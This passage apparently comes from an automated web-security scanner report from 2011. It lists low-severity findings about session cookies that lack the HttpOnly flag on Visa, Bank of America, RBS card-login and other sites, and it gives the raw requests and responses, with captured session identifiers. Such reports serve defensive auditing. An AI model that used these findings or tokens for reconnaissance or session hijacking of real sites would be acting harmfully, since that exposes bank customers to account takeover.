Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 140
Content-Type: text/html
Location: http://www.visa.com
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQADQDTQ=KHMFIEDADGAMLNMGJJAJFNKM; path=/
Date: Wed, 02 Feb 2011 21:59:29 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.visa.com">here</a>.</body>

11.66. http://visa.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://visa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: visa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 140
Content-Type: text/html
Location: http://www.visa.com
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCSSBDQT=NHEDLKDACACCKOPPOLOGOPKL; path=/
Date: Wed, 02 Feb 2011 21:58:56 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.visa.com">here</a>.</body>

11.67. http://visa.via.infonow.net/usa_atm/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://visa.via.infonow.net
Path:   /usa_atm/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usa_atm/ HTTP/1.1
Host: visa.via.infonow.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.29
Set-Cookie: JSESSIONID=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1; Path=/usa_atm
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL', policyref="http://visa.via.infonow.net/w3c/p3p.xml"
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 29339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<
...[SNIP]...

11.68. http://visasignature.mobi/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://visasignature.mobi
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: visasignature.mobi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 02 Feb 2011 22:00:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=puk5wgcWeyj78GP8+NpaJA**; Path=/
Set-Cookie: emvcc=1; Path=/
Location: http://visasignature.mobi/;jsessionid=puk5wgcWeyj78GP8+NpaJA**?emvcc=0
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


11.69. https://www.1sttools.com/loginout/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.1sttools.com
Path:   /loginout/login.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginout/login.asp HTTP/1.1
Host: www.1sttools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 21:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11382
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/
Cache-control: private


<html>
<head>
   <title>LendingTools.com</title>
</head>


   <body onLoad="hndOnLoad();document.forms[0].username.focus();" bgcolor="#FFFFFF" leftmargin="0" topmargin="0" rightmargin="0">



...[SNIP]...

11.70. https://www.accessmycardonline.com/RBS_Consumer/SecuredLogin.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.accessmycardonline.com
Path:   /RBS_Consumer/SecuredLogin.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RBS_Consumer/SecuredLogin.do HTTP/1.1
Host: www.accessmycardonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:12 GMT
Content-type: text/html;charset=iso-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=nyXQNJJQVTn8KD1SsvRkph2vylwYlv0b6WXVqtCWyTfF1WX1dLCL!-1327392406; path=/; secure
Cache-Control: no-cache
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>

<head>
<title>RBS Online</title>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...

11.71. http://www.arbornetworks.com/report  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arbornetworks.com
Path:   /report

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /report HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:36:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:36:01 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:36:01 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:36:02 GMT; path=/
Set-Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:36:02 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.72. http://www.asual.com/swfaddress/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.asual.com
Path:   /swfaddress/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /swfaddress/ HTTP/1.1
Host: www.asual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:45:32 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny9 with Suhosin-Patch
Set-Cookie: JSESSIONID=13FF2143CAF93EAC84619580631ADA51; Path=/
X-UA-Compatible: IE=8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12534

<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Creates open source software and provides profes
...[SNIP]...

11.73. http://www.bankofamerica.com/creditcards/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /creditcards/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 301 Moved permanently
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:06 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Location: https://www4.bankofamerica.com/credit-cards/cardoverview.action?context_id=overview_page
Page-Completion-Status: Normal
Set-Cookie: CFID=134279852; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=2a1d4a0%2D000380c8%2Dd4d6%2D1d49%2Da7ed%2D83e6bfdd0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Set-Cookie: TRACKING_CODE=; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/


       <!--i2a business unit tracking code-->
       <script LANGUAGE="JavaScript" type="text/javascript">
       var ic_bu = "credit+cards";
       </script>


       <!--i2a credit card application start code-->

...[SNIP]...

11.74. http://www.bankofamerica.com/help/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /help/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:22 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=132934232; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=4303b0d%2D0003b41a%2Dd4aa%2D1d49%2Da6b8%2D83deedcb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com;
Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3064379051.20480.0000; path=/


                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- WR26075 -->


<!-- WR26075 -->


                                   
...[SNIP]...

11.75. http://www.bankofamerica.com/help/equalhousing_popup.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:21 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=132369156; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=17f4331%2D00067587%2Dd4a9%2D1d49%2D9237%2D83a7d3cb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/


                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html lang="en-US">
   <head>
       <meta http-equiv="Content-Type" content="te
...[SNIP]...

11.76. http://www.bankofamerica.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm?page=corp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:18 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=131847850; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=18f90e%2D000aada8%2Dd4a6%2D1d49%2D98e7%2D83689ffb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/


                                                                                               <tr valign="top">

   
       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http
...[SNIP]...

11.77. http://www.bankofamerica.com/weblinking/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /weblinking/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weblinking/?referredby=futurescholar HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:33 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=134279832; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=30739eb%2D0002e311%2Dd4b5%2D1d49%2Da7ed%2D83e6bfdd0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/


                                                                                                                                                                                                                                                                                                                                           
...[SNIP]...

11.78. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:00:22 GMT
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; Path=/
Set-Cookie: BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; Expires=Sun, 02 Feb 2031 22:00:22 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48180


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

11.79. https://www.bankofamerica.com/Control.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Control.do?body=where_passcode_popup HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:48 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000hLN0EFuVu6_KB0QSkbXPq6x:12qb4k4pc; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=497; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:48 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description
...[SNIP]...

11.80. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /credit-cards/cardoverview.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:02 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: SMIDENTITY=OCd1eUfyEcTBcdzRmikiUYt9Hcisc1Gh1u9btfXo6jk2iYwtjhebVw1nhgFF6KlmpRdXfWP6oAE1ISBtgIxM3LdoctvAzX27T3D45PQOpMJUeowFgmjuCz+RpSn04+9WLMmF4p/3qP0PVzBHFGFRkzwE5OaT/L0iv4fa0f523oTajKE7dlB/qRvRq16VC3uwSY8nOHjQWKuYZVD9y/EOzzuIC2pbtUE0yVubP+/mxg6D0sevE7x0PoB27bkshtOSL/Y89tKz1feb+T0FxZmgtayMUMoPsHrOu12vLkQLE2hAqZxHc87W+lL+ksrLFRBrg4mECaTf+Y2rhBFThgksB7a7YrXy+P+M1KZi7PFBOBkLBEHb3SHeMWenl/tgGDcsiPv5/+zELJAWZV22EzuihOycvz+1s2wi3UZYCS29J/mO6EQk8LZM1BJ2vaI7/Ay00YstlYJeyAGWhaR17eKkiv9oj3iMJJS7V2AOTwlg0pwItcgPIQ2pQAGe75FFiHk7; path=/; domain=.bankofamerica.com; secure
Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards
Content-language: en-US
Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


11.81. https://www.bankofamerica.com/deposits/index.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/index.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deposits/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:53 GMT
Content-length: 0
Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/deposits/index.action
Content-language: en-US
Set-cookie: JSESSIONID=0000sNWjiXby7ONUwh45995dJgv:12qb4k93q; Path=/
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:52 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


11.82. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/WidgetAction.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:36:37 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Content-Length: 11
Set-Cookie: JSESSIONID=00003PfGoFif26Fdykwp9gAzvj_:15bvh4s8c; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
